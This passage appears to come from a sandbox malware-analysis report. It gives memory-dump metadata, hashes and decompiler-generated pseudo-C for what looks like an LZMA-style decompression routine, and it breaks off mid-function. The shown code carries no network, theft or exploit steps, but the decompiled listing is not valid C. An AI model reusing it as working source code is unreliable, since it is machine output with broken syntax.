                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040726d
                                  0x0040726a
                                  0x00000000
                                  0x00406fbf

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                  • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                  • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                  • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406F07() {
                                  				unsigned short _t531;
                                  				signed int _t532;
                                  				void _t533;
                                  				signed int _t534;
                                  				signed int _t535;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t589;
                                  				signed int* _t606;
                                  				void* _t613;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t613 - 0x40) != 0) {
                                  						 *(_t613 - 0x84) = 0xa;
                                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                  					} else {
                                  						 *(__ebp - 0x84) = 9;
                                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  					}
                                  					while(1) {
                                  						 *(_t613 - 0x54) = _t606;
                                  						while(1) {
                                  							L133:
                                  							_t531 =  *_t606;
                                  							_t589 = _t531 & 0x0000ffff;
                                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  							if( *(_t613 - 0xc) >= _t565) {
                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  								 *(_t613 - 0x40) = 1;
                                  								_t532 = _t531 - (_t531 >> 5);
                                  								 *_t606 = _t532;
                                  							} else {
                                  								 *(_t613 - 0x10) = _t565;
                                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  							}
                                  							if( *(_t613 - 0x10) >= 0x1000000) {
                                  								goto L139;
                                  							}
                                  							L137:
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 5;
                                  								L170:
                                  								_t568 = 0x22;
                                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                  								_t535 = 0;
                                  								L172:
                                  								return _t535;
                                  							}
                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  							L139:
                                  							_t533 =  *(_t613 - 0x84);
                                  							while(1) {
                                  								 *(_t613 - 0x88) = _t533;
                                  								while(1) {
                                  									L1:
                                  									_t534 =  *(_t613 - 0x88);
                                  									if(_t534 > 0x1c) {
                                  										break;
                                  									}
                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                  										case 0:
                                  											if( *(_t613 - 0x6c) == 0) {
                                  												goto L170;
                                  											}
                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  											_t534 =  *( *(_t613 - 0x70));
                                  											if(_t534 > 0xe1) {
                                  												goto L171;
                                  											}
                                  											_t538 = _t534 & 0x000000ff;
                                  											_push(0x2d);
                                  											asm("cdq");
                                  											_pop(_t570);
                                  											_push(9);
                                  											_pop(_t571);
                                  											_t609 = _t538 / _t570;
                                  											_t540 = _t538 % _t570 & 0x000000ff;
                                  											asm("cdq");
                                  											_t604 = _t540 % _t571 & 0x000000ff;
                                  											 *(_t613 - 0x3c) = _t604;
                                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                  												L10:
                                  												if(_t612 == 0) {
                                  													L12:
                                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  													goto L15;
                                  												} else {
                                  													goto L11;
                                  												}
                                  												do {
                                  													L11:
                                  													_t612 = _t612 - 1;
                                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                  												} while (_t612 != 0);
                                  												goto L12;
                                  											}
                                  											if( *(_t613 - 4) != 0) {
                                  												GlobalFree( *(_t613 - 4));
                                  											}
                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  											 *(_t613 - 4) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                  												goto L10;
                                  											}
                                  										case 1:
                                  											L13:
                                  											__eflags =  *(_t613 - 0x6c);
                                  											if( *(_t613 - 0x6c) == 0) {
                                  												 *(_t613 - 0x88) = 1;
                                  												goto L170;
                                  											}
                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  											_t45 = _t613 - 0x48;
                                  											 *_t45 =  *(_t613 - 0x48) + 1;
                                  											__eflags =  *_t45;
                                  											L15:
                                  											if( *(_t613 - 0x48) < 4) {
                                  												goto L13;
                                  											}
                                  											_t546 =  *(_t613 - 0x40);
                                  											if(_t546 ==  *(_t613 - 0x74)) {
                                  												L20:
                                  												 *(_t613 - 0x48) = 5;
                                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                  												goto L23;
                                  											}
                                  											 *(_t613 - 0x74) = _t546;
                                  											if( *(_t613 - 8) != 0) {
                                  												GlobalFree( *(_t613 - 8)); // executed
                                  											}
                                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                  											 *(_t613 - 8) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												goto L20;
                                  											}
                                  										case 2:
                                  											L24:
                                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                  											 *(_t613 - 0x84) = 6;
                                  											 *(_t613 - 0x4c) = _t553;
                                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                  											 *(_t613 - 0x54) = _t606;
                                  											goto L133;
                                  										case 3:
                                  											L21:
                                  											__eflags =  *(_t613 - 0x6c);
                                  											if( *(_t613 - 0x6c) == 0) {
                                  												 *(_t613 - 0x88) = 3;
                                  												goto L170;
                                  											}
                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  											_t67 = _t613 - 0x70;
                                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                  											__eflags =  *_t67;
                                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  											L23:
                                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                  											if( *(_t613 - 0x48) != 0) {
                                  												goto L21;
                                  											}
                                  											goto L24;
                                  										case 4:
                                  											L133:
                                  											_t531 =  *_t606;
                                  											_t589 = _t531 & 0x0000ffff;
                                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  											if( *(_t613 - 0xc) >= _t565) {
                                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  												 *(_t613 - 0x40) = 1;
                                  												_t532 = _t531 - (_t531 >> 5);
                                  												 *_t606 = _t532;
                                  											} else {
                                  												 *(_t613 - 0x10) = _t565;
                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  											}
                                  											if( *(_t613 - 0x10) >= 0x1000000) {
                                  												goto L139;
                                  											}
                                  										case 5:
                                  											goto L137;
                                  										case 6:
                                  											__edx = 0;
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) = 1;
                                  												 *(__ebp - 0x84) = 7;
                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  												while(1) {
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  											__esi =  *(__ebp - 0x60);
                                  											__cl = 8;
                                  											__cl = 8 -  *(__ebp - 0x3c);
                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  											__ecx =  *(__ebp - 0x3c);
                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  											__ecx =  *(__ebp - 4);
                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  											__eflags =  *(__ebp - 0x38) - 4;
                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											if( *(__ebp - 0x38) >= 4) {
                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                  												if( *(__ebp - 0x38) >= 0xa) {
                                  													_t98 = __ebp - 0x38;
                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                  													__eflags =  *_t98;
                                  												} else {
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  												}
                                  											} else {
                                  												 *(__ebp - 0x38) = 0;
                                  											}
                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                  											if( *(__ebp - 0x34) == __edx) {
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												goto L61;
                                  											} else {
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__ecx =  *(__ebp - 8);
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  												goto L41;
                                  											}
                                  										case 7:
                                  											__eflags =  *(__ebp - 0x40) - 1;
                                  											if( *(__ebp - 0x40) != 1) {
                                  												__eax =  *(__ebp - 0x24);
                                  												 *(__ebp - 0x80) = 0x16;
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												__eax =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  												__eax =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 4) + 0x664;
                                  												__eflags = __eax;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L69;
                                  											}
                                  											__eax =  *(__ebp - 4);
                                  											__ecx =  *(__ebp - 0x38);
                                  											 *(__ebp - 0x84) = 8;
                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  											while(1) {
                                  												 *(_t613 - 0x54) = _t606;
                                  												goto L133;
                                  											}
                                  										case 8:
                                  											goto L0;
                                  										case 9:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												goto L89;
                                  											}
                                  											__eflags =  *(__ebp - 0x60);
                                  											if( *(__ebp - 0x60) == 0) {
                                  												goto L171;
                                  											}
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  											__eflags = _t258;
                                  											0 | _t258 = _t258 + _t258 + 9;
                                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  											goto L75;
                                  										case 0xa:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xb;
                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  												while(1) {
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x28);
                                  											goto L88;
                                  										case 0xb:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__ecx =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x20);
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  											} else {
                                  												__eax =  *(__ebp - 0x24);
                                  											}
                                  											__ecx =  *(__ebp - 0x28);
                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  											L88:
                                  											__ecx =  *(__ebp - 0x2c);
                                  											 *(__ebp - 0x2c) = __eax;
                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  											L89:
                                  											__eax =  *(__ebp - 4);
                                  											 *(__ebp - 0x80) = 0x15;
                                  											__eax =  *(__ebp - 4) + 0xa68;
                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  											goto L69;
                                  										case 0xc:
                                  											L99:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xc;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t334 = __ebp - 0x70;
                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t334;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											__eax =  *(__ebp - 0x2c);
                                  											goto L101;
                                  										case 0xd:
                                  											L37:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xd;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t122 = __ebp - 0x70;
                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t122;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L39:
                                  											__eax =  *(__ebp - 0x40);
                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  												goto L48;
                                  											}
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												goto L54;
                                  											}
                                  											L41:
                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  											 *(__ebp - 0x48) = __eax;
                                  											__eax = __eax + 1;
                                  											__eax = __eax << 8;
                                  											__eax = __eax + __ebx;
                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edx = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												 *(__ebp - 0x40) = 1;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												__ebx = __ebx + __ebx + 1;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edx;
                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L39;
                                  											} else {
                                  												goto L37;
                                  											}
                                  										case 0xe:
                                  											L46:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t156 = __ebp - 0x70;
                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t156;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											while(1) {
                                  												L48:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t170 = __edx + 1; // 0x1
                                  													__ebx = _t170;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													continue;
                                  												} else {
                                  													goto L46;
                                  												}
                                  											}
                                  											L54:
                                  											_t173 = __ebp - 0x34;
                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  											__eflags =  *_t173;
                                  											goto L55;
                                  										case 0xf:
                                  											L58:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xf;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t203 = __ebp - 0x70;
                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t203;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L60:
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												L55:
                                  												__al =  *(__ebp - 0x44);
                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  												goto L56;
                                  											}
                                  											L61:
                                  											__eax =  *(__ebp - 0x58);
                                  											__edx = __ebx + __ebx;
                                  											__ecx =  *(__ebp - 0x10);
                                  											__esi = __edx + __eax;
                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												_t217 = __edx + 1; // 0x1
                                  												__ebx = _t217;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L60;
                                  											} else {
                                  												goto L58;
                                  											}
                                  										case 0x10:
                                  											L109:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x10;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t365 = __ebp - 0x70;
                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t365;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											goto L111;
                                  										case 0x11:
                                  											L69:
                                  											__esi =  *(__ebp - 0x58);
                                  											 *(__ebp - 0x84) = 0x12;
                                  											while(1) {
                                  												 *(_t613 - 0x54) = _t606;
                                  												goto L133;
                                  											}
                                  										case 0x12:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 0x58);
                                  												 *(__ebp - 0x84) = 0x13;
                                  												__esi =  *(__ebp - 0x58) + 2;
                                  												while(1) {
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x4c);
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											__eflags = __eax;
                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                  											goto L130;
                                  										case 0x13:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												_t469 = __ebp - 0x58;
                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  												__eflags =  *_t469;
                                  												 *(__ebp - 0x30) = 0x10;
                                  												 *(__ebp - 0x40) = 8;
                                  												L144:
                                  												 *(__ebp - 0x7c) = 0x14;
                                  												goto L145;
                                  											}
                                  											__eax =  *(__ebp - 0x4c);
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											 *(__ebp - 0x30) = 8;
                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  											L130:
                                  											 *(__ebp - 0x58) = __eax;
                                  											 *(__ebp - 0x40) = 3;
                                  											goto L144;
                                  										case 0x14:
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  											__eax =  *(__ebp - 0x80);
                                  											 *(_t613 - 0x88) = _t533;
                                  											goto L1;
                                  										case 0x15:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
